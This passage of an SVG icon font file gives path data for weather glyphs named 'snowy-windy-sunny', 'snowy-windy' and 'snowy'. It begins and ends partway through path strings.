m8-30h3v9l5 5c-1 0-2 1-3 2l-4-5h-9v-3h5l-3-3 3-3 2 3 1-5z m37 26l-2 3-7-6h-6c0-1 0-2 0-2 0-1 0-1 0-2h6l7-6 2 2-3 4h4v4h-4l3 3z m-14 16v-9l-5-5c1-1 2-2 2-3l5 5h9v4h-5l3 3-3 2-3-3v6l-3 0z m11-31h-9l-5 5c0-1-1-2-2-2l5-5v-9h3v5l3-3 3 3-3 3h5l0 3z m-15 10c0-4-3-7-6-7-4 0-7 3-7 7 0 3 3 6 7 6 4 0 6-3 6-6z m-156 61v-9l-8 8-6-6 14-14v-15c1 0 3 0 4 0s3 0 4 0v15l14 14-5 6-9-8v9h-8z m8-75c-1 0-2 0-4 0s-3 0-4 0v-15l-14-14 6-6 8 8v-9h8v9l9-8 6 6-15 14v15z m-23 16c0 1 0 2 0 4 0 1 0 2 0 4h-15l-15 14-5-6 8-8h-9v-8h9l-8-9 5-6 15 15 15 0z m-28 25l20 0 11-11c1 2 3 4 6 6l-11 11-1 20h-8l0-12-6 6-6-5 7-7-12 0v-8z m31-32l-11-11-20 0v-8h12l-7-6 6-6 6 6 0-11h8l1 20 11 11c-3 1-5 3-6 5z m71 23l-6 6-14-14h-15c0-1 0-3 0-4 0-2 0-3 0-4h15l14-15 6 6-8 9h9v8h-9l8 8z m-33 35l0-20-11-11c3-1 5-3 6-6l11 11 20 0v8l-12 0 7 7-6 6-7-7 1 12h-9z m26-69l-20 0-11 11c-1-2-3-4-6-6l11-10 0-21h9l0 12 6-6 6 6-7 6h12v8z m-48 37c-8 0-15-7-15-15s7-15 15-15 15 6 15 15c0 8-7 15-15 15z m81-71v3h-3v-3l-2 3-2-2 4-5v-5c1 0 1 0 2 0s1 0 1 0v5l5 5-2 2-3-3z m0-22c0 0-1 0-1 0-1 0-1 0-2 0v-5l-4-5 2-2 3 3v-3h2v3l3-3 2 2-5 5 0 5z m-8 5c0 0 0 1 0 1 0 1 0 1 0 2h-5l-5 5-2-2 3-3h-3v-3h3l-3-3 2-2 5 5 5 0z m-9 9h7l3-4c1 1 1 1 2 2l-3 4v6h-3v-4l-2 2-2-2 2-2h-4l0-2z m10-11l-3-4h-7v-3h4l-2-2 2-2 2 2v-4h3v7l3 4c-1 0-1 1-2 2z m25 8l-2 2-5-5h-6c1-1 1-1 1-2 0 0 0 0-1-1h6l5-5 2 2-3 3h3v3h-3l3 3z m-12 11v-6l-3-4c1-1 1-1 2-2l3 4h7v2h-4l2 3-2 2-2-3v5l-3-1z m9-23h-7l-3 4c-1-1-2-2-2-2l3-4v-7h3v4l2-2 2 2-2 2h4l0 3z m-11 7c0-2-2-5-5-5s-5 3-5 5 2 5 5 5 5-2 5-5z m135 102v-3l-3 3-2-2 5-5v-5c0 0 1 0 1 0 1 0 1 0 2 0v5l5 5-2 2-3-3v3h-3z m3-25c-1 0-1-1-2-1s-1 1-1 1v-6l-5-5 2-2 3 3v-3h3v3l3-3 2 2-5 5 0 6z m-8 5c0 0 0 1 0 1 0 1 0 1 0 2h-6l-5 5-2-2 3-3h-3v-3h3l-3-3 2-2 5 5h6z m-10 9h7l4-4c0 1 1 1 2 2l-4 4v7h-3v-4l-2 2-2-2 2-2h-4l0-3z m11-11l-4-4h-7v-3h4l-2-2 2-2 2 2v-4h3v7l4 4c-1 0-2 1-2 2z m24 8l-2 2-4-5h-6c0-1 0-1 0-2 0 0 0-1 0-1h6l4-5 2 2-2 3h3v3h-3l2 3z m-11 12v-7l-4-4c1-1 2-1 2-2l4 4h7v3h-4l2 2-2 2-2-2v4l-3 0z m9-24h-7l-4 4c0-1-1-2-2-2l4-4v-7h3v4l2-2 2 2-2 2h4l0 3z m-12 7c0-3-2-5-5-5s-5 2-5 5c0 3 2 6 5 6s5-3 5-6z m-81-91v-3l-2 2-2-1 4-3v-4c0 0 1 0 1 0 0 0 1 0 1 0v4l3 3-1 1-2-2v3h-2z m2-19c-1 0-1 0-1 0-1 0-1 0-1 0v-3l-4-4 2-1 2 2v-2h2v2l2-2 1 1-3 4 0 3z m-6 4c0 0 0 1 0 1 0 0 0 1 0 1h-4l-3 4-2-2 2-2h-2v-2h2l-2-2 2-1 3 3h4z m-7 6h5l3-2c0 0 1 1 1 1l-2 3v5h-2v-3l-2 1-1-1 1-2h-3v-2z m8-7l-3-3h-5v-2h3l-1-2 1-1 2 2v-3h2v5l2 2c0 0-1 1-1 2z m17 5l-1 2-4-4h-4c1 0 1-1 1-1 0 0 0-1-1-1h4l4-3 1 1-2 2h2v2h-2l2 2z m-4 7l-2-1v3h-2v-5l-3-3c1 0 1-1 2-1l3 2h4v2h-2l1 2-1 1z m2-15h-4l-3 3c-1-1-1-1-2-2l3-2v-5h2v3l2-2 1 1-1 2h2v2z m-8 5c0-2-1-4-3-4s-4 2-4 4 2 4 4 4 3-2 3-4z m-74 92v-1l-1 1-1-1 2-2v-3c1 0 1 0 1 0s1 0 1 0v3l2 2-1 1-1-1v1h-2z m0-18v-1h2v1l1-1 1 1-2 2v3c0 0-1 0-1 0 0 0 0 0-1 0v-3l-2-2 1-1 1 1z m-9 8h2l-2-2 1-1 3 3h3c0 0 0 0 0 0s0 1 0 1h-3l-2 3-1-1 1-2h-2v-1z m2 4h3l2-2c1 1 1 1 1 1l-2 2v4h-1v-2l-1 1-1-1 1-1h-2l0-2z m4-12v4l2 2c0 0-1 0-1 1l-2-2h-3v-2h2l-1-1 1-1 1 1v-2l1 0z m13 12l-3-3h-2c0 0 0 0 0-1s0 0 0 0h2l3-3 1 1-2 2h2v1h-2l2 2-1 1z m-5 5v-4l-2-2c1 0 1 0 1-1l2 2h4v2h-2l1 1-1 1-1-1v2l-2 0z m5-12h-4l-2 2c0-1-1-1-1-1l2-2v-4h1v2l1-1 1 1-1 1h2l1 2z m-6 3c0-1-1-2-3-2s-2 1-2 2c0 2 1 3 2 3s3-1 3-3z" />
<glyph glyph-name="snowy-windy-sunny" horiz-adv-x="1000" unicode="&#xee7b;" d="M522 411c-30 30-66 38-107 23-7-3-10-3-14 6-26 65-87 101-157 93-63-7-113-57-125-125 0-4 0-9-5-11-11-5-20-12-27-20v0s-54-50-1-108c1-2 2-4 4-5l1-1 0 0c12-12 29-19 48-21 21-2 41 0 62-1l176 0c27 0 51 0 75 0 43 2 74 23 91 62 16 36 8 80-21 108z m-108 81c-3 2-7 2-10-1-6-5-5-13 2-17 8-4 16-8 24-12 7-3 9-3 15 2l2 3v1c0 5-2 9-6 11-9 4-18 9-27 13z m-146 63c-1-3-2-6-3-9 50 1 95-21 123-61 2 2 3 5 4 7 18 34 4 76-30 93-35 18-77 4-94-30z m142-25c-1-4 1-8 5-10 1-1 3-2 4-2 11 1 21 1 31 2 6 1 9 5 9 10 0 6-4 10-9 10-11 0-22-1-32-2-4 0-8-4-8-8z m-43 62c5-2 11 0 14 5 2 4 4 9 6 13l6 13 1 0c2 5 0 11-5 14-5 2-11 0-13-5-5-9-9-17-13-26-3-5-1-11 4-14z m-148-24c5-2 9-5 14-7 4-2 8-4 13-6 5-3 10-1 13 3 3 5 1 11-4 14-9 5-18 9-27 14-5 2-11 0-13-5-3-5-1-11 4-13z m181-7c4-1 7-2 10 0 9 6 17 12 26 17 4 3 5 9 2 14-3 4-9 6-13 3-9-6-18-11-26-17-6-4-5-14 1-17z m-79 43c6-4 14 1 14 9-1 10-1 20-2 30 0 5-5 9-10 9-6-1-10-5-10-11 1-10 1-19 2-29 0-4 2-7 6-8z m-49-12c1-1 3-2 4-3 4-2 9-1 12 2 3 3 4 8 1 12-5 8-11 17-16 25-3 5-9 6-14 3-5-4-6-9-3-14l16-25z m414-298c-39 0-79 0-118 0l0 0c-9-20-22-35-37-45 52 0 105 0 158-1 55 0 96-44 90-97-4-39-47-67-82-55-28 11-41 44-25 66 13 18 37 19 51 2 9-10 21-11 31-4 9 7 11 20 5 30-14 25-48 37-78 29-60-16-79-83-44-132 17-23 39-34 66-39h25c10 3 20 5 30 9 60 26 85 96 55 157-25 54-69 80-127 80z m-97 127c13-1 24 7 24 20 1 21 18 35 31 35 22 2 42-12 48-32 10-34-17-75-53-78-23-2-46-1-68-1 4-14 6-30 4-45 20 0 39 0 59 0 57 0 107 51 106 108-1 54-39 92-92 94-42 2-78-35-79-77 0-13 8-23 20-24z m331 15c-18 21-41 29-68 23-24-5-39-21-46-45-2-5-2-11-2-16 1-12 9-20 21-21 11-1 20 5 23 17 4 18 10 23 22 21 15-3 24-17 22-31-3-21-19-34-42-34-29 0-58 0-87 0-13 0-21-6-24-16-4-15 5-28 20-29 18 0 36 0 54 0 23 1 46-3 69 5 53 17 74 85 38 126z m-577-251v-4l-4 4-2-3 6-7v-7c1 1 1 1 2 1 1 0 1 0 2-1v7l7 7-3 3-4-4v4h-4z m4-34c-1 0-1 0-2 0s-1 0-2 0v-7l-6-6 2-3 4 4v-4h4v4l4-4 2 3-6 6v7z m-11 7c0 1 0 1 0 2 0 0 0 1 0 2h-7l-6 6-3-2 4-4h-4v-4h4l-4-4 3-2 6 6 7 0z m-13 11h10l5-5c0 2 1 2 2 3l-5 5v9h-3v-5l-3 3-3-3 3-3h-5l-1-4z m8-31h4v9l5 5c-1 1-2 2-2 3l-5-5h-10v-4h6l-3-3 2-2 3 3 0-6z m39 28l-3 2-6-6h-7c0-1 0-2 0-2 0-1 0-2 0-2h7l6-7 3 3-4 4h4v3h-4l4 5z m-15 15v-9l-5-5c1 0 2-1 3-2l5 5h9v3h-5l2 3-2 3-3-3v5l-4 0z m12-31h-9l-5 5c-1-1-2-2-3-3l5-4v-10h4v6l3-3 2 3-3 3h6l0 3z m-15 10c0-4-3-7-7-7s-7 3-7 7 3 7 7 7 7-3 7-7z m-160 62v-9l-9 9-5-6 14-15v-16c1 1 3 1 4 1s3 0 4-1v16l15 15-6 6-9-9v9h-8z m8-76c-1 0-2 0-4 0s-3 0-4 0v-16l-14-14 5-6 9 9v-10h8v10l9-9 6 6-15 14v16z m-23 16c-1 1-1 2-1 4 0 1 0 3 1 4h-16l-15 15-5-6 8-9h-9v-8h9l-8-9 5-6 15 15h16z m-29 26l20 0 11-11c2 2 4 4 6 6l-11 11 0 20h-8l0-12-7 7-6-6 7-7-12 0v-8z m31-33l-11-11-20 0v-8h12l-7-7 6-6 7 7 0-12h8l0 20 11 11c-2 2-4 4-6 6z m73 24l-5 6-15-15h-16c0-1 1-3 1-4 0-2-1-3-1-4h16l14-15 6 6-8 9h9v8h-9l8 9z m-33 35l0-20-11-11c2-2 4-4 6-6l11 11 20 0v8l-12 0 7 7-6 6-7-7 0 12h-8z m26-70l-20 0-12 11c-1-2-3-4-5-6l11-11 0-21h8l0 13 7-7 6 6-7 7h12v8z m-49 37c-8 0-15-7-15-15 0-9 7-15 15-15 9 0 15 6 15 15 0 8-6 15-15 15z m83-72v3h-3v-3l-3 3-2-2 5-5v-5c1 0 1 0 2 0s1 0 1 0v5l5 5-2 2-3-3z m0-23c0 0-1 0-1 0-1 0-1 0-2 0v-5l-5-5 2-2 3 3v-3h3v3l3-3 2 2-5 5v5z m-8 6c0 0 0 0 0 1 0 0 0 1 0 1h-5l-5 5-2-2 3-3h-4v-2h4l-3-3 2-2 5 5h5z m-10 8h7l4-3c0 0 1 1 2 2l-4 3v7h-3v-4l-2 2-2-2 2-2h-4l0-3z m11-11l-4-3h-7v-3h4l-2-2 2-2 2 2v-4h3v7l4 3c-1 1-2 2-2 2z m25 8l-2 2-5-5h-6c1 0 1 0 1-1 0 0 0-1-1-1h6l5-5 2 2-3 3h3v2h-3l3 3z m-12 12v-7l-3-3c0-1 1-2 2-2l3 3h7v3h-4l2 2-2 2-2-2v4l-3 0z m9-23h-7l-3 3c-1 0-2-1-2-2l3-3v-7h3v4l2-3 2 2-2 3h4l0 3z m-11 7c0-3-2-5-5-5s-6 2-6 5c0 3 3 5 6 5s5-2 5-5z m138 104v-3l-3 3-2-2 5-5v-5c0 0 1 0 1 0s1 0 2 0v5l5 5-2 2-3-3v3h-3z m3-26c-1 0-1 0-2 0s-1 0-1 0v-6l-5-5 2-2 3 3v-3h3v3l3-3 2 2-5 5 0 6z m-9 5c0 1 0 1 0 2s0 1 0 1h-5l-5 5-2-2 3-3h-3v-3h3l-3-3 2-2 5 5 5 0z m-10 9h7l4-4c1 1 1 2 2 2l-4 4v7h-3v-4l-2 3-2-3 2-2h-4v-3z m11-11l-4-4h-7v-3h5l-3-2 2-2 3 2v-4h2v7l4 4c0 0-1 1-2 2z m26 8l-2 2-6-5h-5c0 0 0-1 0-1s0-1 0-2h6l5-5 2 2-3 3h3v3h-3l3 3z m-12 13v-8l-4-3c1-1 2-2 2-3l4 4h7v3h-4l2 3-2 2-2-3v5h-3z m9-25h-7l-4 4c0-1-1-1-2-2l4-4v-7h3v4l2-2 2 2-2 2h4v3z m-12 8c0-3-2-6-5-6s-5 3-5 6 2 5 5 5 5-2 5-5z m-83-94v-2l-2 2-2-2 4-3v-4c0 0 1 0 1 0 0 0 1 0 1 0v4l3 3-1 2-2-2v2h-2z m2-19c0 0-1 0-1 0 0 0-1 0-1 0v-3l-3-4 1-1 2 2v-2h2v2l2-2 2 1-4 4v3z m-6 4c0 1 0 1 0 1 0 1 0 1 0 1h-4l-3 4-1-2 2-2h-3v-2h3l-2-2 1-1 3 3h4z m-7 7h5l3-3c0 0 1 1 1 1l-2 3v5h-2v-3l-2 2-1-2 1-1h-3v-2z m8-8l-3-3h-5v-2h3l-1-2 1-1 2 2v-3h2v5l2 2c0 1-1 1-1 2z m18 5l-2 2-3-4h-4c0 0 0 0 0-1 0 0 0 0 0-1h4l3-3 2 1-2 2h2v2h-2l2 2z m-5 8l-1-2v3h-2v-5l-3-3c0 0 1-1 1-1l3 3h5v2h-3l2 1-2 2z m3-16h-5l-3 3c0-1-1-1-1-2l3-3v-5h2v3l1-1 2 1-2 2h3v2z m-8 5c0-2-2-3-4-3s-4 1-4 3 2 4 4 4 4-2 4-4z m-76 94v-1l-1 1-1-1 2-2v-3c0 0 1 0 1 0 0 0 0 0 1 0v3l2 2-1 1-1-1v1h-2z m0-18v-2h2v2l1-2 1 1-3 3v3c0 0 0 0 0 0s-1 0-1 0v-3l-3-3 1-1 2 2z m-9 8h1l-1-2 1-1 3 3h2c0 0 0 0 0 0 0 1 0 1 0 1h-2l-3 3-1-1 1-2h-1v-1z m1 4h4l2-2c0 1 0 1 1 1l-2 2v4h-2v-2l-1 1-1-1 1-1h-2l0-2z m5-12v3l2 2c-1 1-1 1-1 1l-2-2h-4v-1h2l-1-1 1-1 1 1v-2l2 0z m13 12l-3-3h-3c0 0 0 0 0-1 0 0 0 0 0 0h3l3-3 1 1-2 2h2v1h-2l2 2-1 1z m-5 5v-4l-2-2c0 0 1 0 1-1l2 2h3v2h-2l1 1-1 1-1-1v2l-1 0z m4-13h-3l-2 2c0 0-1 0-1-1l2-2v-3h1v2l2-1 1 1-2 1h3l-1 1z m-6 4c0-1-1-2-2-2s-3 1-3 2 1 3 3 3 2-1 2-3z" />
<glyph glyph-name="snowy-windy" horiz-adv-x="1000" unicode="&#xee7c;" d="M530 469c-31 30-68 39-109 24-8-3-11-3-14 6-27 66-89 103-160 95-64-8-115-59-127-128-1-4 0-9-5-11-12-5-21-12-28-20l0 0s-54-51-1-110c1-2 3-4 4-5l1-1 0 0c13-12 29-20 49-22 21-2 42 0 63 0l179 0c27 0 52-1 76 0 44 2 75 22 92 62 17 38 9 82-20 110z m161-123c-38 0-77 0-116 0l0 0c-8-19-20-34-36-44 52 0 103 0 155 0 54-1 94-44 88-96-3-38-46-66-80-53-27 10-40 43-25 64 13 18 37 19 51 2 8-9 20-11 30-3 9 6 11 19 5 29-14 24-47 36-77 28-58-15-77-81-42-129 16-22 38-33 64-38h25c9 3 19 5 29 9 58 25 83 93 54 154-25 52-67 77-125 77z m-95 125c13-1 24 6 24 19 1 21 17 34 31 35 20 1 40-12 46-32 10-34-17-73-52-76-22-2-44-2-67-1 5-14 7-29 5-44 19 0 38 0 57 0 56 0 106 50 104 106-1 52-38 89-90 91-41 2-77-33-77-75 0-13 8-22 19-23z m324 15c-17 19-40 27-66 22-24-6-39-21-46-45-1-5-1-10-1-15 0-12 8-20 20-21 11-1 20 6 23 17 4 17 10 22 21 20 14-2 24-16 22-30-3-20-19-33-42-34h-84c-13 0-21-5-24-15-4-14 5-27 20-28 17-1 35 0 52 0 23 1 46-3 68 4 52 18 72 84 37 125z m-558-247v-4l-4 4-2-2 6-7v-7c1 1 1 1 2 1 0 0 1 0 2-1v7l6 7-3 2-3-4v4h-4z m4-33c-1 0-2 0-2 0-1 0-1 0-2 0v-7l-6-6 2-2 4 3v-4h4v4l4-3 2 2-6 6 0 7z m-11 7c0 1 0 1 0 2 0 1 0 1 0 2h-6l-7 6-2-2 3-4h-4v-4h4l-3-4 2-2 7 6 6 0z m-12 11h9l5-4c0 1 1 2 2 2l-5 5 0 9h-4v-5l-3 3-2-3 3-3h-5l0-4z m8-30h3l0 9 5 5c-1 0-2 1-2 2l-5-5h-9v-3h5l-3-3 3-3 3 3 0-5z m37 26l-2 3-7-6h-6c0-1 0-2 0-2s0-1 0-2h6l7-6 2 2-3 4h4v4h-4l3 3z m-14 16l0-9-5-5c1 0 2-1 2-2l5 4h9v4h-5l3 3-3 2-3-2v5h-3z m11-31h-9l-5 5c0-1-1-2-2-2l5-5 0-9h4v5l3-3 2 3-3 3h5l0 3z m-14 10c0-4-3-7-7-7-4 0-7 3-7 7 0 4 3 6 7 6 4 1 7-2 7-6z m-157 61v-9l-8 8-6-5 14-15v-15c2 0 3 0 4 0 2 0 3 0 4 0v15l15 15-6 5-8-8v9h-9z m8-74c-1-1-2-1-4-1-1 0-3 0-4 1v-16l-14-14 6-6 8 8v-9h8v9l9-8 5 6-14 14v16h0z m-23 15c0 1 0 2 0 4 0 1 0 3 0 4h-15l-15 14-5-6 8-8h-9v-8h9l-8-9 5-5 15 14 15 0z m-28 25l20 0 11-11c1 3 3 5 6 6l-11 11-1 20h-8l0-12-6 7-6-6 7-7-12 0v-8z m31-32l-11-10-20 0v-9h12l-7-6 6-6 6 7 0-12h8l1 20 11 11c-3 1-5 3-6 5z m71 23l-6 6-14-14h-15c0-1 0-3 0-4 0-2 0-3 0-4h15l14-15 6 6-8 9h9v8h-9l8 8z m-33 35l0-20-11-11c3-1 5-3 6-6l11 11 20 0v8l-12 0 7 7-6 6-7-7 1 12h-9z m26-68l-20-1-11 11c-1-2-3-4-6-6l11-10 0-21h9l0 12 6-6 6 6-7 6h12v9z m-48 36c-8 0-15-7-15-15 0-8 7-15 15-15s15 7 15 15c0 8-7 15-15 15z m81-71v3h-3v-3l-2 3-2-2 4-5v-5c1 0 1 0 2 0 0 0 1 0 1 0v5l5 5-2 2-3-3z m0-22c0 0-1 0-1 0-1 0-1 0-2 0v-5l-4-5 2-2 2 3v-3h3v3l3-3 2 2-5 5v5z m-8 5c0 1 0 1 0 2 0 0 0 1 0 1h-5l-5 5-2-2 3-3h-3v-3h3l-3-3 2-2 5 5h5z m-9 9h7l3-4c1 1 1 2 2 2l-4 4v7h-2v-4l-3 2-1-2 2-2h-4v-3z m10-11l-3-4h-7v-3h4l-2-2 1-2 3 2v-4h2v7l4 4c-1 0-1 1-2 2z m25 8l-2 2-5-5h-5c0-1 0-1 0-2 0 0 0-1 0-1h5l5-5 2 2-3 3h3v3h-3l3 3z m-12 12v-7l-3-4c0 0 1-1 2-2l3 4h7v3h-4l2 2-2 2-2-2v4h-3z m9-24h-7l-3 4c-1-1-1-2-2-2l4-4v-7h2v4l3-2 1 2-2 2h4v3z m-11 8c0-3-2-6-5-6s-5 3-5 6 2 5 5 5 5-3 5-5z m135 102v-3l-3 2-2-2 5-4v-6c0 0 1 0 1 0 1 0 1 0 2 0v6l5 4-2 2-3-2v3h-3z m3-26c-1 0-1 0-2 0 0 0-1 0-1 0v-5l-5-5 2-2 3 3v-4h3v4l3-3 2 2-5 5 0 5z m-8 5c0 0-1 1-1 1 0 1 1 1 1 2h-6l-5 5-2-2 3-3h-3v-3h3l-3-3 2-2 5 5 6 0z m-10 9h7l4-4c0 1 1 2 2 2l-4 4v7h-3v-4l-2 2-2-2 2-2h-4v-3z m11-11l-4-4h-7v-3h4l-2-2 2-2 2 2v-4h3v7l4 4c-1 0-2 1-2 2z m24 8l-2 2-5-5h-5c0 0 0-1 0-1 0-1 0-1 0-2h5l5-5 2 2-3 3h4v3h-4l3 3z m-11 12v-7l-4-4c1 0 2-1 2-2l4 4h7v3h-4l2 2-2 2-2-2v4h-3z m9-24h-7l-4 4c0-1-1-2-2-2l4-4v-7h3v4l2-2 2 2-2 2h4v3z m-12 7c0-2-2-5-5-5-3 0-5 3-5 5 0 3 2 6 5 6 3 0 5-3 5-6z m-81-91v-3l-2 2-2-1 4-3v-4c0 0 0 0 1 0 0 0 1 0 1 0v4l3 3-1 1-2-2v3h-2z m2-18c-1-1-1-1-1-1-1 0-1 0-1 1v-4l-4-4 2-1 2 2v-2h2v2l2-2 1 1-3 4 0 4z m-6 3c0 1 0 1 0 1 0 1 0 1 0 1h-4l-3 4-2-2 2-2h-2v-2h3l-2-2 1-1 3 3 4 0z m-7 6h5l3-2c0 0 1 1 1 1l-2 3v5h-2v-3l-2 1-1-1 1-2h-3v-2z m8-7l-3-3h-5v-2h3l-2-2 2-1 1 2v-3h2v5l3 2c0 1-1 1-1 2z m17 5l-1 2-4-4h-3c0 0 0 0 0-1 0 0 0-1 0-1h3l4-3 1 1-2 2h2v2h-2l2 2z m-4 7l-2-1v3h-2v-5l-3-3c1 0 1-1 2-1l3 2h4v2h-2l1 2-1 1z m2-15h-4l-3 3c0-1-1-1-2-2l3-2v-5h2v3l2-2 1 1-1 2h2v2z m-8 5c0-2-1-3-3-3s-4 1-4 3 2 4 4 4c2 0 3-2 3-4z m-74 92v-1l-1 1-1-1 2-2v-3c1 0 1 0 1 0s1 0 1 0v3l2 2-1 1-1-1v1h-2z m0-18v-1h2v1l1-1 1 1-2 2v3c0 0-1 0-1 0 0 0 0 0-1 0v-3l-2-2 1-1 1 1z m-9 8h2l-2-2 1-1 3 3h3c0 0 0 0 0 0 0 1 0 1 0 1h-3l-2 3-1-1 1-2h-2v-1z m2 4h3l2-2c0 1 1 1 1 1l-2 2v4h-1v-2l-1 1-1-1 1-1h-2v-2z m4-12v4l2 2c0 0-1 0-1 1l-2-2h-3v-2h2l-1-1 1-1 1 1v-2h1z m13 12l-3-3h-2c0 0 0 0 0 0 0-1 0-1 0-1h2l3-3 1 1-2 2h2v1h-2l2 2-1 1z m-5 5v-4l-2-2c1 0 1 0 1-1l2 2h4v2h-2l1 1-1 1-1-1v2h-2z m5-12h-4l-2 2c0-1-1-1-1-1l2-2v-4h1v2l2-1 1 1-2 1h3v2z m-6 4c0-2-1-3-3-3-1 0-2 1-2 3 0 1 1 2 2 2 2 0 3-1 3-2z" />
<glyph glyph-name="snowy" horiz-adv-x="1000" unicode="&#xee7d;" d="M886 551c-55 53-120 68-192 41-13-5-19-5-25 11-47 117-157 181-281 167-114-13-203-103-224-225-1-7 0-16-9-20-20-9-36-21-49-35l0 0s-96-90-3-194c3-3 6-7 8-9 1-1 1-1 2-2l0 1c22-22 51-35 87-39 36-3 73 0 110-1l315 1c48 0 92-1 135 0 76 3 132 40 163 110 29 66 14 143-37 194z m-316-392v-8l-7 7-4-5 11-11v-13c1 0 2 1 3 1s3 0 4-1v13l11 11-4 5-7-7v8h-7z m7-61c-1 0-2 0-3 0-2 0-3 0-4 0v-12l-11-12 4-5 7 7v-7h7v7l7-7 5 5-12 11 0 13z m-19 12c0 2 0 3 0 4 0 1 0 2 0 3h-13l-11 12-5-5 7-7h-7v-7h7l-7-7 5-4 11 11 13 0z m-23 21l16 0 9-9c1 2 3 4 5 5l-9 9 0 16h-7v-9l-5 5-5-5 5-5h-9l0-7z m14-56h7l0 17 9 9c-2 1-4 2-5 4l-9-9-16 1v-7h9l-5-5 5-5 5 5 0-10z m69 49l-4 5-12-12h-13c1-1 1-2 1-3 0-1 0-3-1-4h13l12-11 4 5-7 6h8v7h-8l7 7z m-26 28l-1-16-8-9c1-1 3-3 4-5l9 9 17 0v7h-10l5 5-4 5-6-6v10l-6 0z m21-56l-17 0-9 9c-1-2-3-3-5-5l9-8 0-17h7v10l5-5 5 4-5 6h9l1 6z m-40 30c-6 0-12-6-12-12 0-7 6-12 12-12 7 0 13 5 13 12 0 6-6 12-13 12z m-274 100v-17l-15 15-11-10 26-26v-29c3 1 5 1 8 1 3 0 5 0 7-1v29l26 26-10 10-16-15v17h-15z m15-137c-2 0-4 0-7 0-3 0-5 0-8 0v-28l-26-26 11-10 15 15v-17h15v17l16-15 10 10-26 26v28z m-42 28c0 2-1 5-1 8 0 2 1 5 1 7h-28l-26 26-11-11 16-15h-17v-15h17l-16-15 11-11 26 26h28z m-52 47l37 0 20-20c3 4 6 8 10 11l-20 19 0 37-15 0 0-22-12 12-10-11 12-11-22 0 0-15z m57-59l-20-20-37 1 0-15 22 0-12-12 11-11 11 12 0-22 15 0 0 37 21 20c-5 2-8 6-11 10z m131 43l-11 10-26-26h-28c0-2 1-5 1-7 0-3-1-5-1-8h28l26-26 11 11-16 15h17v15h-17l16 16z m-60 63l-1-37-20-20c4-2 8-6 11-10l20 20 37-1 0 15-22 1 12 11-11 11-12-12 1 22-15 0z m47-125l-37-1-20 20c-3-4-6-8-11-10l20-20 1-37 15 0 0 22 11-12 11 11-12 12 22 0v15z m-88 66c-15 0-27-12-27-27s12-28 27-28 27 13 27 28c0 15-12 27-27 27z m148-129v5h-5v-5l-5 5-4-4 9-8v-10c1 0 2 0 3 0s2 0 2 0v10l9 8-3 4-6-5z m0-41c0 0-1 0-2 0s-2 0-3 0v-10l-9-8 4-4 5 5v-5h5v5l5-5 4 4-9 8 0 10z m-14 9c0 1 0 2 0 3 0 1 0 2 0 3h-10l-8 8-4-3 5-5h-5v-6h5l-5-5 4-3 8 8h10z m-18 16l13 0 7-6c0 1 2 2 3 3l-7 7 0 12h-5v-7l-4 4-3-4 4-4h-8l0-5z m20-20l-7-6-13 0v-5h8l-4-4 3-4 4 4v-7h5l0 12 7 7c-1 1-2 2-3 3z m44 15l-4 3-8-8h-10c0-1 0-2 0-3 0-1 0-2 0-3h10l8-8 4 3-5 5h5v6h-5l5 5z m-20 21l-1-12-6-7c1-1 2-2 3-3l7 6 13 0v5h-8l4 4-3 4-4-4v7l-5 0z m16-42l-13 0-7 6c-1-1-2-2-3-3l7-7 0-12h5v7l4-4 3 4-4 4h8l0 5z m-30 22c-5 0-9-4-9-9s4-9 9-9 9 4 9 9c0 5-4 9-9 9z m256 178v-6l-5 5-4-3 9-9v-10c1 0 2 0 2 0 1 0 2 0 3 0v10l9 9-4 3-5-5v6h-5z m5-47c-1-1-2-1-2-1-1 0-2 0-3 1v-10l-9-9 4-4 5 6v-6h5v6l6-6 3 4-9 9 0 10z m-15 9c0 1 0 2 0 3 0 1 0 2 0 2h-9l-9 9-4-3 5-6h-5v-5h5l-5-5 4-4 9 9 9 0z m-18 16l13 0 7-6c1 1 2 2 4 3l-7 7 0 13h-5v-8l-5 4-3-3 4-4h-8l0-6z m20-20l-7-7-13 0v-5h8l-4-4 4-4 4 4v-7h5l0 13 7 7c-2 0-3 2-4 3z m46 15l-4 3-9-9h-10c0 0 0-1 0-2 0-1 0-2 0-3h10l9-9 4 4-6 5h6v5h-6l6 6z m-21 22l0-13-7-7c1-1 2-2 3-3l7 6 13 0v6h-8l5 4-4 3-4-4v8l-5 0z m16-44l-13 0-7 7c-1-1-2-3-3-4l7-6 0-13h5v7l4-4 4 4-4 4h7l0 5z m-30 23c-6 0-10-4-10-9 0-5 4-10 10-10 5 0 9 4 9 10s-4 9-9 9z m-140-177v-4l-4 4-3-3 7-6v-7c0 0 1 0 1 0 1 0 2 0 2 0v7l6 6-2 3-4-4v4h-3z m3-33c0 0-1-1-2-1 0 0-1 1-1 1v-7l-7-7 3-2 4 4v-4h3v4l4-4 3 2-7 7 0 7z m-10 6c0 1 0 2 0 2 0 1 0 1 0 2h-7l-6 6-3-2 4-4h-4v-4h4l-4-4 3-2 6 6 7 0z m-13 12h9l5-5c1 1 2 2 3 2l-5 5v9h-4v-5l-3 3-2-3 3-3h-6l0-3z m14-14l-5-5h-9v-4h5l-2-3 2-2 3 2v-5h4v9l5 5c-1 1-2 2-3 3z m32 10l-3 2-6-6h-7c0-1 0-1 0-2 0 0 0-1 0-2h7l6-6 3 3-4 4h4v3h-4l4 4z m-8 13l-3-3v5h-4v-9l-5-5c1 0 2-1 3-2l5 5h9v3h-5l2 3-2 3z m5-28h-9l-5 5c-1-1-2-2-3-3l5-5v-9h4v6l3-3 2 2-3 3h6l0 4z m-15 9c0-3-3-6-7-6s-6 3-6 6c0 4 3 7 6 7s7-3 7-7z m-135 169v-3l-3 2-2-1 5-5v-5c0 0 0 0 1 0 0 0 1 0 1 0v5l5 5-2 1-3-2v3h-2z m0-33v-3h2v3l3-3 2 2-5 5v5c0 0-1 0-1 0-1 0-1 0-1 0v-5l-5-5 2-2 3 3z m-17 14h3l-3-3 2-2 5 5h5c0 0 0 0 0 1 0 0 0 1 0 1h-5l-5 5-2-2 3-3h-3v-2z m2 8h7l4-4c0 1 1 2 1 2l-3 4v6h-3v-4l-2 2-2-2 2-2h-3l-1-2z m9-22v6l3 4c0 0-1 1-2 1l-3-3h-7v-3h4l-2-2 2-2 2 2v-4l3 1z m23 21l-5-5h-5c0 0 0-1 0-1 0-1 0-1 0-1h5l5-5 2 2-3 3h3v2h-3l3 3-2 2z m-9 9v-6l-3-4c0 0 1-1 1-2l4 4h7v2h-4l2 2-2 2-2-2v4h-3z m8-22h-6l-4 3c0 